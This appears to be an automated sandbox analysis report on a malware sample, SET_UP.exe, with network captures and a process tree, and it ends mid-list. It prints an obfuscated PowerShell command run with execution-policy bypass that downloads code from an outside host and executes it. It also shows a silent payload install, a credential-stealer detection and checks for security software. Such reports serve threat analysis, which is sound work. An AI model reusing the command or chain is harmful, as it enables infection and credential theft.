2025-01-05 17:02:28 UTC  218                IN         Data Raw: 64 34 0d 0a 6f 78 50 35 68 46 63 4c 5a 66 58 68 6d 67 61 77 50 52 2f 54 44 4b 71 6b 34 74 41 78 49 79 45 77 46 69 70 47 30 73 66 77 52 33 6e 34 61 4e 76 78 64 54 46 48 6e 5a 58 75 64 73 4d 48 51 2f 78 51 68 63 65 48 74 30 51 4e 55 6c 68 35 57 68 72 39 2f 38 56 77 54 5a 45 6c 79 37 42 6a 50 54 6e 61 6b 66 49 6f 78 45 56 72 38 53 43 49 77 70 62 79 43 78 45 4e 45 6e 4d 49 66 4f 4f 36 33 44 78 62 31 6a 48 44 70 6a 39 2f 45 59 57 53 6f 46 71 66 59 54 43 34 59 4d 50 55 6c 4b 56 63 53 6c 4a 46 66 77 51 31 75 71 69 41 47 31 62 4b 66 59 33 62 4e 47 63 56 71 70 4c 79 5a 35 35 4a 5a 36 63 75 68 6f 61 45 70 42 4d 5a 45 52 77 30 54 32 54 6f 39 34 30 61 0d 0a
Data Ascii: d4oxP5hFcLZfXhmgawPR/TDKqk4tAxIyEwFipG0sfwR3n4aNvxdTFHnZXudsMHQ/xQhceHt0QNUlh5Whr9/8VwTZEly7BjPTnakfIoxEVr8SCIwpbyCxENEnMIfOO63Dxb1jHDpj9/EYWSoFqfYTC4YMPUlKVcSlJFfwQ1uqiAG1bKfY3bNGcVqpLyZ55JZ6cuhoaEpBMZERw0T2To940a
2025-01-05 17:02:28 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49757        185.161.251.21  443               7480  C:\Users\user\Desktop\SET_UP.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:02:29 UTC  201                OUT        GET /8574262446/ph.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: cegu.shop
2025-01-05 17:02:29 UTC  249                IN         HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Sun, 05 Jan 2025 17:02:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 329
Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
Connection: close
ETag: "676c9e2a-149"
Accept-Ranges: bytes
2025-01-05 17:02:29 UTC  329                IN         Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49758        104.21.37.128   443               7480  C:\Users\user\Desktop\SET_UP.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:02:30 UTC  206                OUT        GET /int_clp_sha.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: klipvumisui.shop
2025-01-05 17:02:30 UTC  899                IN         HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:30 GMT
Content-Type: text/plain
Content-Length: 8767044
Connection: close
Accept-Ranges: bytes
ETag: "51f99eddd33cc04fb0f55f873b76d907"
Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyJHf6upBDAs58iendTlLd0xqLOveM7PZUFTICmXtGxyoY4Tt7SdRhy8MIL040aMxNOHHAxzgdaDcwfy9cySOFrm3EbtCp1WHPJjXljK7d0%2F8o5kMpZjXpykG%2FnsVlIaBhZb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd5094fc962439c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1565&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1763285&cwnd=224&unsent_bytes=0&cid=99f0caeec97dee09&ts=282&x=0"
2025-01-05 17:02:30 UTC  470                IN         Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: MZP@!L!This program must be run under Win32$7
2025-01-05 17:02:30 UTC  1369               IN         Data Raw: 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00
Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2025-01-05 17:02:30 UTC  1369               IN         Data Raw: 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74
Data Ascii: RESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Dat
2025-01-05 17:02:30 UTC  1369               IN         Data Raw: 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54
Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassT
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81
                                                                                                                                                                                                Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53
                                                                                                                                                                                                Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TS
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29
                                                                                                                                                                                                Data Ascii: truction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00
                                                                                                                                                                                                Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00
                                                                                                                                                                                                Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03
                                                                                                                                                                                                Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

Target ID:0
Start time:12:02:00
Start date:05/01/2025
Path:C:\Users\user\Desktop\SET_UP.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\SET_UP.exe"
Imagebase:0x400000
File size:76'245'722 bytes
MD5 hash:7E62ABCAF3030A9400FB60B5F2EE2484
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:4
Start time:12:02:28
Start date:05/01/2025
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
Imagebase:0xcf0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:12:02:28
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:12:02:35
Start date:05/01/2025
Path:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
Imagebase:0xc50000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 74%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:7
Start time:12:02:36
Start date:05/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
Imagebase:0xed0000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:8
Start time:12:02:37
Start date:05/01/2025
Path:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
Imagebase:0xc50000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:moderate
Has exited:true

Target ID:9
Start time:12:02:38
Start date:05/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
Imagebase:0x9f0000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:10
Start time:12:03:05
Start date:05/01/2025
Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"timeout" 9
                                                                                                                                                                                                Imagebase:0x7ff70e1b0000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:12:03:05
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
